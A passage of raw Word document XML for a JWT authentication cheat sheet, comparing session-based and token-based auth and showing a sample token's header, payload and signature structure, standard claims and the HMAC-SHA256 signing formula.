              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">∑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Complete Summary &amp; Cheat Sheet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Everything You Need to Know —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1B3E" w:sz="4"/>
              <w:left w:val="single" w:color="0D1B3E" w:sz="20"/>
              <w:bottom w:val="single" w:color="0D1B3E" w:sz="4"/>
              <w:right w:val="single" w:color="0D1B3E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT is a stateless authentication mechanism where the user proves identity using a signed token — instead of the server maintaining session state.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40"/>
        <w:gridCol w:w="4720"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Session Auth (Old Way)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Server stores user data in RAM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Session ID sent as cookie</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Breaks on restart, scales poorly</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Easy to revoke</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Good for simple web apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Auth (Modern Way)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Token carries all data (stateless)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sent in Authorization header</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Survives restarts, scales perfectly</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Hard to revoke early</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Ideal for APIs &amp; microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT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E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  JWT STRUCTURE  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> eyJhbGciOiJIUzI1NiJ9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">eyJ1c2VySWQiOjEwMX0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFCC80"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SflKxwRJSMeKKF2QT4fw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    HEADER (alg+typ)    PAYLOAD (claims)    SIGNATURE (hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  CLAIMS  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sub=subject  iss=issuer  exp=expiry  iat=issued-at  aud=audience</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  SIGNATURE  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> HMAC-SHA256(base64(header)+'.'+base64(payload), SECRET_KEY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
